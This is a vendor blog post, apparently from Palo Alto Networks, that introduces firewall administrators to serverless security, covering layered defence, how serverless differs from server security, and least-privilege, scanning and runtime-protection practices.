A Firewall Admin's Introduction to Serverless Security

Nov 05, 2019
5 minutes

Ron Harnik, Senior Product Marketing Manager, Serverless Security

One of the most interesting things about working at Palo Alto Networks is getting to see pretty much every type of enterprise cybersecurity under the sun deployed in real-life situations. From Next-Generation Firewalls protecting network segments in data centers to WildFire preventing zero-day exploits, and from cloud security with Prisma Cloud to the cutting edge of endpoint protection with Cortex XDR, we encounter and learn from it all. Serverless computing is the latest in a long line of cloud technologies, and many organizations are still wrapping their heads around it. I want to share my view from the front line to help security teams who are taking their first steps in the serverless world. 

I come from a networking background, and I eventually made my way into the world of cloud and stayed there. It’s easy to live in the cloud bubble and forget about everything else, but the more I talk with customers and learn about their use-cases, the more I see just how versatile today’s enterprise security teams have to be. 

Serverless allows organizations to run applications without having to worry about infrastructure, networking, or operating systems. Everything is abstracted away up until the application code itself. It’s the latest in a long line of cloud technologies that enable faster, more scalable and cheaper application development and deployment. Just as with any other technology, your organization wants to reap the benefits quickly and looks to you to make sure it’s safe to do so. So let’s take a high-level look at serverless and the key points you should consider when trying to secure it. 


My Company Wants to Use Serverless. Now What?

Just like any other advancement in software development technology, serverless comes with its own set of strengths and weaknesses that we have to consider. One key advantage is that with serverless, your security starting point is actually quite strong since all concerns about server and network security are abstracted away by the cloud provider.

To get into more detail about how serverless computing works, the term “serverless” generally refers to an operational model in which applications rely on managed services that abstract away the need to manage, patch and secure infrastructure and virtual machines. Serverless applications rely on a combination of managed cloud services and function-as-a-service (FaaS). FaaS products like AWS Lambda or Google Cloud Functions allow you to host pieces of code directly on the cloud provider and use a variety of events to trigger that code.

Since joining Palo Alto Networks through the acquisition of PureSec, the serverless security platform, I have had the chance to talk to security teams from large enterprises who are now expected to secure virtual machines, containers and serverless workloads, as well as internal corporate networks. They’re trying to figure out which steps they should take to address serverless security, and several questions come up frequently.


Are My Current Security Solutions Irrelevant?

Even when adoption happens rapidly, it doesn’t happen overnight. Especially at large enterprises, the environments that host your business applications are going to remain heterogenous for a long while. This means that a layered approach to security is still the best course of action. 

If we apply the “Swiss Cheese Model” to cloud security, every technology, product or service we use is a slice of swiss cheese with holes (vulnerabilities) in it. Multiple security controls help us make sure those holes don’t align, preventing openings that allow attackers to be successful. 

The challenge of securing heterogeneous environments is that each type of workload (virtual machines, containers, serverless) is architected differently and requires a unique method of security to gain full coverage. For example, you might need to have a virtualized firewall protecting the perimeter of your cloud networks, a cloud workload protection platform defending each workload and a cloud security posture management solution for overall visibility and governance. 

Your current security solutions will likely remain relevant for some time, but you may need to combine them with new ones for more complete coverage. 


So, How Is Serverless Security Different?

With serverless, we have no control over the infrastructure or network our application runs on. This means that we can’t rely on server-based security or network filtering. It’s also important to acknowledge that serverless functions can be triggered by hundreds of event sources. Each event source might send data in a different format. These events can include IoT triggers, API calls and other cloud services. While we can definitely route an HTTP request through a firewall, we have no control over an S3 bucket change triggering a Lambda function. 

Considering the new attack vectors serverless introduces, like event-injection attacks, it becomes clear that serverless workloads require their own flavor of security. 


Fundamentals of Serverless Security

With no networks or servers to protect, serverless security becomes focused on ensuring code integrity, tight permissions and application behavior analysis. The main tenets of serverless security are:

  • Access and permissions: Maintain least-privileged access for serverless functions and other services. For example, if an AWS Lambda function needs to access a DynamoDB table, make sure it can only perform the specific action the business logic requires.
  • Vulnerability scanning: Ensure code and infrastructure-as-code template integrity by regularly scanning for vulnerable third-party dependencies, configuration errors and over-permissive roles.
  • Runtime protection: Use runtime protection to detect malicious event inputs and anomalous function behavior, and limit as necessary each function’s ability to access files, hosts, the internet and spawn child processes.


Subscribe to the Blog!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.